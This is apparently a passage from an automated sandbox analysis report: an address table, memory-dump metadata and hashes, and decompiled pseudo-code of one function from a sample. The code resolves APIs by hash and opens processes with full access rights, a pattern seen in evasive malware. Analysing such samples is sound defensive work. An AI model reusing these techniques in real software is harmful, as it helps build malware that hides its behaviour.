                                                                                                                                      0x00000000
                                                                                                                                      0x73229fae
                                                                                                                                      0x73229fb3
                                                                                                                                      0x73229fba
                                                                                                                                      0x73229fc7
                                                                                                                                      0x73229fc9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73229fcf
                                                                                                                                      0x73229fd8
                                                                                                                                      0x73229fd9
                                                                                                                                      0x73229fdb
                                                                                                                                      0x73229fde
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73229fe0
                                                                                                                                      0x7322a000
                                                                                                                                      0x7322a005
                                                                                                                                      0x7322a007
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a016
                                                                                                                                      0x7322a022
                                                                                                                                      0x7322a02d
                                                                                                                                      0x7322a039
                                                                                                                                      0x7322a043
                                                                                                                                      0x7322a043
                                                                                                                                      0x7322a046
                                                                                                                                      0x7322a04e
                                                                                                                                      0x7322a05a
                                                                                                                                      0x7322a069
                                                                                                                                      0x7322a071
                                                                                                                                      0x7322a074
                                                                                                                                      0x7322a07d
                                                                                                                                      0x7322a08d
                                                                                                                                      0x7322a092
                                                                                                                                      0x7322a09d
                                                                                                                                      0x7322a0a6
                                                                                                                                      0x7322a0b9
                                                                                                                                      0x7322a0ba
                                                                                                                                      0x7322a0c1
                                                                                                                                      0x7322a0c8
                                                                                                                                      0x7322a0cf
                                                                                                                                      0x7322a0d0
                                                                                                                                      0x7322a0db
                                                                                                                                      0x7322a0dd
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a0e3
                                                                                                                                      0x7322a0e8
                                                                                                                                      0x7322a0ef
                                                                                                                                      0x7322a0fa
                                                                                                                                      0x7322a0fc
                                                                                                                                      0x7322a1b3
                                                                                                                                      0x7322a1ba
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a1ba
                                                                                                                                      0x7322a102
                                                                                                                                      0x7322a10b
                                                                                                                                      0x7322a10c
                                                                                                                                      0x7322a10e
                                                                                                                                      0x7322a111
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a113
                                                                                                                                      0x7322a118
                                                                                                                                      0x7322a123
                                                                                                                                      0x7322a123
                                                                                                                                      0x7322a126
                                                                                                                                      0x7322a12a
                                                                                                                                      0x7322a134
                                                                                                                                      0x7322a138
                                                                                                                                      0x7322a13f
                                                                                                                                      0x7322a14a
                                                                                                                                      0x7322a14e
                                                                                                                                      0x7322a158
                                                                                                                                      0x7322a162
                                                                                                                                      0x7322a166
                                                                                                                                      0x7322a16c
                                                                                                                                      0x7322a177
                                                                                                                                      0x7322a179
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a183
                                                                                                                                      0x7322a188
                                                                                                                                      0x7322a18f
                                                                                                                                      0x7322a19a
                                                                                                                                      0x7322a19c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a19e
                                                                                                                                      0x7322a1a7
                                                                                                                                      0x7322a1a8
                                                                                                                                      0x7322a1aa
                                                                                                                                      0x7322a1ad
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a1ad
                                                                                                                                      0x7322a200
                                                                                                                                      0x7322a202
                                                                                                                                      0x7322a209
                                                                                                                                      0x7322a20e
                                                                                                                                      0x7322a211
                                                                                                                                      0x7322a21f
                                                                                                                                      0x7322a230
                                                                                                                                      0x7322a23c
                                                                                                                                      0x7322a248
                                                                                                                                      0x7322a254
                                                                                                                                      0x7322a260
                                                                                                                                      0x7322a26c
                                                                                                                                      0x7322a275
                                                                                                                                      0x7322a27e
                                                                                                                                      0x7322a287
                                                                                                                                      0x7322a28e
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a290
                                                                                                                                      0x73229b9e
                                                                                                                                      0x73229ba9
                                                                                                                                      0x73229bb2
                                                                                                                                      0x73229bb7
                                                                                                                                      0x73229bc3
                                                                                                                                      0x73229bc4
                                                                                                                                      0x73229bd4
                                                                                                                                      0x73229be2
                                                                                                                                      0x73229bf5
                                                                                                                                      0x73229c01
                                                                                                                                      0x73229c0d
                                                                                                                                      0x73229c19
                                                                                                                                      0x73229c20
                                                                                                                                      0x73229c23
                                                                                                                                      0x73229c2e
                                                                                                                                      0x73229c30
                                                                                                                                      0x73229cdb
                                                                                                                                      0x73229cdb
                                                                                                                                      0x73229cde
                                                                                                                                      0x73229ce7
                                                                                                                                      0x73229ceb
                                                                                                                                      0x73229cef
                                                                                                                                      0x73229cf5
                                                                                                                                      0x73229cf9
                                                                                                                                      0x73229d05
                                                                                                                                      0x73229d0f
                                                                                                                                      0x73229d13
                                                                                                                                      0x73229d19
                                                                                                                                      0x73229d1f
                                                                                                                                      0x73229d24
                                                                                                                                      0x73229d26
                                                                                                                                      0x73229d3e
                                                                                                                                      0x73229d4a
                                                                                                                                      0x73229d5e
                                                                                                                                      0x73229d63
                                                                                                                                      0x73229d6c
                                                                                                                                      0x73229d6f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73229d75
                                                                                                                                      0x73229d7a
                                                                                                                                      0x73229d81
                                                                                                                                      0x73229d8e
                                                                                                                                      0x73229d90
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73229d90
                                                                                                                                      0x73229d28
                                                                                                                                      0x73229d2f
                                                                                                                                      0x00000000
                                                                                                                                      0x73229d2f
                                                                                                                                      0x73229c36
                                                                                                                                      0x73229c41
                                                                                                                                      0x73229c4f
                                                                                                                                      0x73229c54
                                                                                                                                      0x73229c56
                                                                                                                                      0x73229c59
                                                                                                                                      0x73229c62
                                                                                                                                      0x73229c66
                                                                                                                                      0x73229c6e
                                                                                                                                      0x73229c74
                                                                                                                                      0x73229c78
                                                                                                                                      0x73229c7e
                                                                                                                                      0x73229c8b
                                                                                                                                      0x73229c8f
                                                                                                                                      0x73229c93
                                                                                                                                      0x73229c9b
                                                                                                                                      0x73229ca1
                                                                                                                                      0x73229ca6
                                                                                                                                      0x73229ca8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73229cac
                                                                                                                                      0x73229cad
                                                                                                                                      0x73229cb2
                                                                                                                                      0x73229cbc
                                                                                                                                      0x73229cc3
                                                                                                                                      0x73229cce
                                                                                                                                      0x73229cd5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73229cd5
                                                                                                                                      0x00000000
                                                                                                                                      0x73229d96
                                                                                                                                      0x73229d96
                                                                                                                                      0x73229d9f
                                                                                                                                      0x73229da0
                                                                                                                                      0x73229da2
                                                                                                                                      0x73229da2
                                                                                                                                      0x00000000
                                                                                                                                      0x73229dab
                                                                                                                                      0x73229449
                                                                                                                                      0x7322944d
                                                                                                                                      0x73229456
                                                                                                                                      0x7322945f
                                                                                                                                      0x00000000

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $EA
                                                                                                                                      • API String ID: 0-4251458306
                                                                                                                                      • Opcode ID: 80716f7d9932a8435d794f8eef15c3f3082733db5f990e4f7c043aaba32ebe7a
                                                                                                                                      • Instruction ID: d8122eff47990d93b896c6b4164f66ba0f177e737f30ae93f21a720fb6110563
                                                                                                                                      • Opcode Fuzzy Hash: 80716f7d9932a8435d794f8eef15c3f3082733db5f990e4f7c043aaba32ebe7a
                                                                                                                                      • Instruction Fuzzy Hash: D6A28271505341AFD725DF24CC40BDEBBF4AF96301F018A2DE4999B1A1EFB0A985CB52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                      			E7322A5A4(signed int* __ecx, void* __eflags) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t182;
                                                                                                                                      				signed int _t183;
                                                                                                                                      				signed int* _t188;
                                                                                                                                      				void* _t198;
                                                                                                                                      				void* _t199;
                                                                                                                                      				void* _t228;
                                                                                                                                      				void* _t229;
                                                                                                                                      				void* _t242;
                                                                                                                                      				void* _t243;
                                                                                                                                      				void* _t251;
                                                                                                                                      				signed int* _t271;
                                                                                                                                      				void* _t282;
                                                                                                                                      				void* _t284;
                                                                                                                                      				void* _t285;
                                                                                                                                      				void* _t296;
                                                                                                                                      				signed int* _t308;
                                                                                                                                      				void* _t324;
                                                                                                                                      				signed int _t398;
                                                                                                                                      				signed int _t402;
                                                                                                                                      				intOrPtr* _t403;
                                                                                                                                      				intOrPtr* _t404;
                                                                                                                                      				signed int _t406;
                                                                                                                                      				signed int _t407;
                                                                                                                                      				signed int _t409;
                                                                                                                                      				signed int _t411;
                                                                                                                                      				signed int _t412;
                                                                                                                                      				void* _t413;
                                                                                                                                      				signed int _t414;
                                                                                                                                      				signed int _t415;
                                                                                                                                      				signed int _t416;
                                                                                                                                      				signed int _t419;
                                                                                                                                      				void* _t420;
                                                                                                                                      				signed int _t421;
                                                                                                                                      				void* _t422;
                                                                                                                                      				signed int _t424;
                                                                                                                                      				signed int _t429;
                                                                                                                                      				signed int _t433;
                                                                                                                                      				signed int _t434;
                                                                                                                                      				signed int _t437;
                                                                                                                                      				intOrPtr* _t439;
                                                                                                                                      
                                                                                                                                      				_t308 = __ecx;
                                                                                                                                      				 *(_t439 + 0x78) = 0;
                                                                                                                                      				 *_t439 = __ecx + 8;
                                                                                                                                      				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
                                                                                                                                      				while(1) {
                                                                                                                                      					_t392 =  *_t308;
                                                                                                                                      					E7322B714(_t439 + 0x24, _t392, 0x7fffffff);
                                                                                                                                      					if(E7322F56C(_t439 + 0x24) == 0) {
                                                                                                                                      						goto L3;
                                                                                                                                      					} else {
                                                                                                                                      						_t308[0xc] = 0;
                                                                                                                                      						E7322F6F0(_t439 + 0x24);
                                                                                                                                      					}
                                                                                                                                      					L63:
                                                                                                                                      					_t398 = 0xffffffffffffffff;
                                                                                                                                      					_t407 = 0xffffffffffffffff;
                                                                                                                                      					L65:
                                                                                                                                      					if((_t407 | _t398) != 0) {
                                                                                                                                      						L68:
                                                                                                                                      						return _t407;
                                                                                                                                      					}
                                                                                                                                      					if( *(_t439 + 0x78) != 0x20) {
                                                                                                                                      						E7323218C(0x5dc, _t392, _t407);
                                                                                                                                      						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
                                                                                                                                      						continue;
                                                                                                                                      					}
                                                                                                                                      					_t398 = 0xffffffffffffffff;
                                                                                                                                      					_t407 = 0xffffffffffffffff;
                                                                                                                                      					goto L68;
                                                                                                                                      					L3:
                                                                                                                                      					__eflags = _t308[1];
                                                                                                                                      					if(_t308[1] <= 0) {
                                                                                                                                      						L21:
                                                                                                                                      						__eflags =  *(_t439 + 0x20);
                                                                                                                                      						if( *(_t439 + 0x20) <= 0) {
                                                                                                                                      							L33:
                                                                                                                                      							E7322F6F0(_t439 + 0x24);
                                                                                                                                      							__eflags = _t308[0xc];
                                                                                                                                      							if(_t308[0xc] == 0) {
                                                                                                                                      								L46:
                                                                                                                                      								 *((intOrPtr*)(_t439 + 8)) = 0;
                                                                                                                                      								 *((intOrPtr*)(_t439 + 0xc)) = 0;
                                                                                                                                      								E7322F620(_t439 + 0x14, 0);
                                                                                                                                      								 *((intOrPtr*)(_t439 + 0x38)) = 0;
                                                                                                                                      								 *(_t439 + 0x34) =  *_t308;
                                                                                                                                      								E7322F620(_t439 + 0x40, 0);
                                                                                                                                      								_t182 = 0x40;
                                                                                                                                      								__eflags = _t308[7] - 0x40;
                                                                                                                                      								_t183 =  <  ? _t308[7] : _t182;
                                                                                                                                      								 *(_t439 + 0x74) = _t183;
                                                                                                                                      								__eflags = _t183;
                                                                                                                                      								if(_t183 <= 0) {
                                                                                                                                      									L57:
                                                                                                                                      									asm("movq xmm0, [0x7323b7a8]");
                                                                                                                                      									asm("movq [esp+0x84], xmm0");
                                                                                                                                      									_t406 = E73232F8C(0xa5eabdf8, 0xd1a06a90);
                                                                                                                                      									__eflags = _t406;
                                                                                                                                      									if(_t406 == 0) {
                                                                                                                                      										_t424 = 0;
                                                                                                                                      										__eflags = 0;
                                                                                                                                      										L61:
                                                                                                                                      										__eflags = _t424 - 0x3f;
                                                                                                                                      										if(_t424 <= 0x3f) {
                                                                                                                                      											__eflags = _t424 << 2;
                                                                                                                                      											_t308[0xc] =  *(E7322F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
                                                                                                                                      											_t188 = E7322F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
                                                                                                                                      											_t407 = _t308[0xc];
                                                                                                                                      											asm("cdq");
                                                                                                                                      											_t308[0xd] =  *_t188;
                                                                                                                                      											_t398 = _t392;
                                                                                                                                      											E7322B680(_t439 + 0x34);
                                                                                                                                      											E7322B680(_t439 + 8);
                                                                                                                                      											goto L65;
                                                                                                                                      										}
                                                                                                                                      										L62:
                                                                                                                                      										E7322B680(_t439 + 0x34);
                                                                                                                                      										E7322B680(_t439 + 8);
                                                                                                                                      										goto L63;
                                                                                                                                      									}
                                                                                                                                      									_t392 = E7322F558(_t439 + 0x14, 0);
                                                                                                                                      									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
                                                                                                                                      									_t133 = _t198 - 0x80; // -128
                                                                                                                                      									_t199 = _t133;
                                                                                                                                      									__eflags = _t199 - 0x3f;
                                                                                                                                      									_t424 =  <=  ? _t199 : _t198;
                                                                                                                                      									__eflags = _t424 - 0x102;
                                                                                                                                      									if(_t424 == 0x102) {
                                                                                                                                      										goto L62;
                                                                                                                                      									}
                                                                                                                                      									goto L61;
                                                                                                                                      								}
                                                                                                                                      								_t437 = 0;
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								while(1) {
                                                                                                                                      									E7322CB48(_t439 + 0x4c);
                                                                                                                                      									_t392 = 0;
                                                                                                                                      									_t324 = _t439 + 0x4c;
                                                                                                                                      									 *((char*)(_t324 + 4)) = 0;
                                                                                                                                      									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
                                                                                                                                      									__eflags = E7322C33C(_t324);
                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4(_t439 + 0x14, E7322F568(_t439 + 0x10) + 4);
                                                                                                                                      									 *((intOrPtr*)(E7322F558(_t439 + 0x14, E7322F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
                                                                                                                                      									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
                                                                                                                                      									_t409 = E73232F8C(0xa5eabdf8, 0xf3119fba);
                                                                                                                                      									__eflags = _t409;
                                                                                                                                      									if(_t409 == 0) {
                                                                                                                                      										L51:
                                                                                                                                      										_t392 =  *(_t439 + 0x68);
                                                                                                                                      										__eflags = _t392;
                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                      											break;
                                                                                                                                      										}
                                                                                                                                      										__eflags = _t392 - 0xffffffff;
                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                      											E7322F8C4(_t439 + 0x40, E7322F568(_t439 + 0x3c) + 4);
                                                                                                                                      											 *(E7322F558(_t439 + 0x40, E7322F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
                                                                                                                                      											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
                                                                                                                                      											E7322CDE0(_t439 + 0x4c, __eflags);
                                                                                                                                      											_t437 = _t437 + 1;
                                                                                                                                      											__eflags = _t437 -  *(_t439 + 0x74);
                                                                                                                                      											if(_t437 <  *(_t439 + 0x74)) {
                                                                                                                                      												continue;
                                                                                                                                      											}
                                                                                                                                      											_t411 = 0;
                                                                                                                                      											__eflags = 0;
                                                                                                                                      											do {
                                                                                                                                      												E7322F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
                                                                                                                                      												E7322F558(_t439 + 0x40, _t411 * 4);
                                                                                                                                      												_t439 = _t439 + 0xffffffd8;
                                                                                                                                      												asm("cdq");
                                                                                                                                      												asm("pxor xmm5, xmm5");
                                                                                                                                      												asm("movd xmm1, dword [ebp]");
                                                                                                                                      												asm("movd xmm4, dword [edi]");
                                                                                                                                      												asm("movd xmm0, edx");
                                                                                                                                      												asm("cdq");
                                                                                                                                      												asm("punpckldq xmm1, xmm0");
                                                                                                                                      												asm("movq xmm2, [ebx+0x38]");
                                                                                                                                      												asm("movq [esp], xmm1");
                                                                                                                                      												asm("movd xmm3, edx");
                                                                                                                                      												asm("punpckldq xmm4, xmm3");
                                                                                                                                      												asm("movq [esp+0x8], xmm2");
                                                                                                                                      												asm("movq [esp+0x10], xmm4");
                                                                                                                                      												asm("movq [esp+0x18], xmm5");
                                                                                                                                      												asm("movq [esp+0x20], xmm5");
                                                                                                                                      												E7322AD04(__eflags);
                                                                                                                                      												_t411 = _t411 + 1;
                                                                                                                                      												__eflags = _t411 -  *(_t439 + 0x74);
                                                                                                                                      											} while (_t411 <  *(_t439 + 0x74));
                                                                                                                                      											goto L57;
                                                                                                                                      										}
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									_t392 = _t439 + 0x68;
                                                                                                                                      									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
                                                                                                                                      									__eflags = 0;
                                                                                                                                      									if(0 != 0) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									goto L51;
                                                                                                                                      								}
                                                                                                                                      								E7322CDE0(_t439 + 0x4c, __eflags);
                                                                                                                                      								goto L62;
                                                                                                                                      							}
                                                                                                                                      							_t402 = _t308[1];
                                                                                                                                      							__eflags = _t402;
                                                                                                                                      							if(_t402 <= 0) {
                                                                                                                                      								goto L46;
                                                                                                                                      							}
                                                                                                                                      							_t412 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							while(1) {
                                                                                                                                      								_t429 = _t412 * 4;
                                                                                                                                      								_t392 =  *(E7322F558( *((intOrPtr*)(_t439 + 4)), _t429));
                                                                                                                                      								__eflags = _t392 - _t308[0xd];
                                                                                                                                      								if(_t392 == _t308[0xd]) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t412 = _t412 + 1;
                                                                                                                                      								__eflags = _t412 - _t402;
                                                                                                                                      								if(_t412 < _t402) {
                                                                                                                                      									continue;
                                                                                                                                      								}
                                                                                                                                      								goto L46;
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t412 - 0xffffffff;
                                                                                                                                      							if(_t412 != 0xffffffff) {
                                                                                                                                      								_t228 = E7322F568( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                      								__eflags = _t228 - _t429;
                                                                                                                                      								if(_t228 > _t429) {
                                                                                                                                      									_t392 = 4 + _t412 * 4;
                                                                                                                                      									 *(_t439 + 0x6c) = _t392;
                                                                                                                                      									_t251 = E7322F568( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                      									__eflags = _t251 -  *(_t439 + 0x6c);
                                                                                                                                      									if(_t251 >  *(_t439 + 0x6c)) {
                                                                                                                                      										 *((intOrPtr*)(_t439 + 0x90)) = E7322F558( *((intOrPtr*)(_t439 + 8)), _t429);
                                                                                                                                      										 *((intOrPtr*)(_t439 + 0x8c)) = E7322F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
                                                                                                                                      										E7323382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E7322F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
                                                                                                                                      										_t439 = _t439 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4( *((intOrPtr*)(_t439 + 8)), E7322F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                                                      									_t74 =  &(_t308[7]);
                                                                                                                                      									 *_t74 = _t308[7] - 1;
                                                                                                                                      									__eflags =  *_t74;
                                                                                                                                      								}
                                                                                                                                      								_t229 = E7322F568( *_t439);
                                                                                                                                      								__eflags = _t229 - _t429;
                                                                                                                                      								if(_t229 > _t429) {
                                                                                                                                      									_t413 = 4 + _t412 * 4;
                                                                                                                                      									_t242 = E7322F568( *_t439);
                                                                                                                                      									__eflags = _t242 - _t413;
                                                                                                                                      									if(_t242 > _t413) {
                                                                                                                                      										_t243 = E7322F558( *((intOrPtr*)(_t439 + 4)), _t429);
                                                                                                                                      										 *((intOrPtr*)(_t439 + 0x94)) = E7322F558( *((intOrPtr*)(_t439 + 4)), _t413);
                                                                                                                                      										E7323382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E7322F568( *_t439) - _t413);
                                                                                                                                      										_t439 = _t439 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4( *((intOrPtr*)(_t439 + 4)), E7322F568( *_t439) + 0xfffffffc);
                                                                                                                                      									_t79 =  &(_t308[1]);
                                                                                                                                      									 *_t79 = _t308[1] - 1;
                                                                                                                                      									__eflags =  *_t79;
                                                                                                                                      								}
                                                                                                                                      								E7322F8C4( *((intOrPtr*)(_t439 + 8)), E7322F568( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                                                      								 *(E7322F558( *((intOrPtr*)(_t439 + 8)), E7322F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
                                                                                                                                      								_t308[7] = _t308[7] + 1;
                                                                                                                                      								E7322F8C4( *((intOrPtr*)(_t439 + 4)), E7322F568( *_t439) + 4);
                                                                                                                                      								 *(E7322F558( *((intOrPtr*)(_t439 + 4)), E7322F568( *_t439) + 0xfffffffc)) = _t308[0xd];
                                                                                                                                      								_t308[1] = _t308[1] + 1;
                                                                                                                                      							}
                                                                                                                                      							goto L46;
                                                                                                                                      						}
                                                                                                                                      						_t433 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						do {
                                                                                                                                      							 *(_t439 + 0x70) = _t433 * 4;
                                                                                                                                      							_t403 = E7322F558(_t439 + 0x28, _t433 * 4);
                                                                                                                                      							_t392 = _t308[1];
                                                                                                                                      							 *(_t439 + 0x80) = _t392;
                                                                                                                                      							__eflags = _t392;
                                                                                                                                      							if(_t392 <= 0) {
                                                                                                                                      								L29:
                                                                                                                                      								_t414 = E73232F8C(0x4bcc7cba, 0x997e6547);
                                                                                                                                      								__eflags = _t414;
                                                                                                                                      								if(_t414 != 0) {
                                                                                                                                      									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E7322F558(_t439 + 0x28,  *(_t439 + 0x70)))));
                                                                                                                                      									__eflags = _t416;
                                                                                                                                      									if(_t416 != 0) {
                                                                                                                                      										E7322F8C4( *((intOrPtr*)(_t439 + 8)), E7322F568( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                                                      										 *(E7322F558( *((intOrPtr*)(_t439 + 8)), E7322F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
                                                                                                                                      										_t308[7] = _t308[7] + 1;
                                                                                                                                      										_t271 = E7322F558(_t439 + 0x28,  *(_t439 + 0x70));
                                                                                                                                      										E7322F8C4( *((intOrPtr*)(_t439 + 4)), E7322F568( *_t439) + 4);
                                                                                                                                      										 *(E7322F558( *((intOrPtr*)(_t439 + 4)), E7322F568( *_t439) + 0xfffffffc)) =  *_t271;
                                                                                                                                      										_t57 =  &(_t308[1]);
                                                                                                                                      										 *_t57 = _t308[1] + 1;
                                                                                                                                      										__eflags =  *_t57;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								goto L32;
                                                                                                                                      							}
                                                                                                                                      							_t415 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							while(1) {
                                                                                                                                      								_t392 =  *(E7322F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
                                                                                                                                      								__eflags = _t392 -  *_t403;
                                                                                                                                      								if(_t392 ==  *_t403) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t415 = _t415 + 1;
                                                                                                                                      								__eflags = _t415 -  *(_t439 + 0x80);
                                                                                                                                      								if(_t415 <  *(_t439 + 0x80)) {
                                                                                                                                      									continue;
                                                                                                                                      								}
                                                                                                                                      								goto L29;
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t415 - 0xffffffff;
                                                                                                                                      							if(_t415 == 0xffffffff) {
                                                                                                                                      								goto L29;
                                                                                                                                      							}
                                                                                                                                      							L32:
                                                                                                                                      							_t433 = _t433 + 1;
                                                                                                                                      							__eflags = _t433 -  *(_t439 + 0x20);
                                                                                                                                      						} while (_t433 <  *(_t439 + 0x20));
                                                                                                                                      						goto L33;
                                                                                                                                      					} else {
                                                                                                                                      						_t434 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						do {
                                                                                                                                      							 *(_t439 + 0x64) = _t434 * 4;
                                                                                                                                      							_t404 = E7322F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
                                                                                                                                      							_t392 =  *(_t439 + 0x20);
                                                                                                                                      							 *(_t439 + 0x7c) = _t392;
                                                                                                                                      							__eflags = _t392;
                                                                                                                                      							if(_t392 <= 0) {
                                                                                                                                      								L11:
                                                                                                                                      								_t282 = E7322F568( *_t439);
                                                                                                                                      								__eflags = _t282 -  *(_t439 + 0x64);
                                                                                                                                      								if(_t282 >  *(_t439 + 0x64)) {
                                                                                                                                      									_t420 = 4 + _t434 * 4;
                                                                                                                                      									_t296 = E7322F568( *_t439);
                                                                                                                                      									__eflags = _t296 - _t420;
                                                                                                                                      									if(_t296 > _t420) {
                                                                                                                                      										 *((intOrPtr*)(_t439 + 0x9c)) = E7322F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
                                                                                                                                      										 *((intOrPtr*)(_t439 + 0x98)) = E7322F558( *((intOrPtr*)(_t439 + 4)), _t420);
                                                                                                                                      										E7323382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E7322F568( *_t439) - _t420);
                                                                                                                                      										_t439 = _t439 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4( *((intOrPtr*)(_t439 + 4)), E7322F568( *_t439) + 0xfffffffc);
                                                                                                                                      									_t22 =  &(_t308[1]);
                                                                                                                                      									 *_t22 = _t308[1] - 1;
                                                                                                                                      									__eflags =  *_t22;
                                                                                                                                      								}
                                                                                                                                      								_t419 = E73232F8C(0xa5eabdf8, 0x2c2324e8);
                                                                                                                                      								__eflags = _t419;
                                                                                                                                      								if(_t419 != 0) {
                                                                                                                                      									 *_t419( *((intOrPtr*)(E7322F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
                                                                                                                                      								}
                                                                                                                                      								_t284 = E7322F568( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                      								__eflags = _t284 -  *(_t439 + 0x64);
                                                                                                                                      								if(_t284 >  *(_t439 + 0x64)) {
                                                                                                                                      									_t422 = 4 + _t434 * 4;
                                                                                                                                      									_t285 = E7322F568( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                      									__eflags = _t285 - _t422;
                                                                                                                                      									if(_t285 > _t422) {
                                                                                                                                      										 *((intOrPtr*)(_t439 + 0xa4)) = E7322F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
                                                                                                                                      										 *((intOrPtr*)(_t439 + 0xa0)) = E7322F558( *((intOrPtr*)(_t439 + 8)), _t422);
                                                                                                                                      										E7323382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E7322F568( *((intOrPtr*)(_t439 + 4))) - _t422);
                                                                                                                                      										_t439 = _t439 + 0xc;
                                                                                                                                      									}
                                                                                                                                      									E7322F8C4( *((intOrPtr*)(_t439 + 8)), E7322F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                                                      									_t33 =  &(_t308[7]);
                                                                                                                                      									 *_t33 = _t308[7] - 1;
                                                                                                                                      									__eflags =  *_t33;
                                                                                                                                      								}
                                                                                                                                      								_t434 = _t434 - 1;
                                                                                                                                      								__eflags = _t434;
                                                                                                                                      								goto L20;
                                                                                                                                      							}
                                                                                                                                      							_t421 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							while(1) {
                                                                                                                                      								_t392 =  *(E7322F558(_t439 + 0x28, _t421 * 4));
                                                                                                                                      								__eflags = _t392 -  *_t404;
                                                                                                                                      								if(_t392 ==  *_t404) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t421 = _t421 + 1;
                                                                                                                                      								__eflags = _t421 -  *(_t439 + 0x7c);
                                                                                                                                      								if(_t421 <  *(_t439 + 0x7c)) {
                                                                                                                                      									continue;
                                                                                                                                      								}
                                                                                                                                      								goto L11;
                                                                                                                                      							}
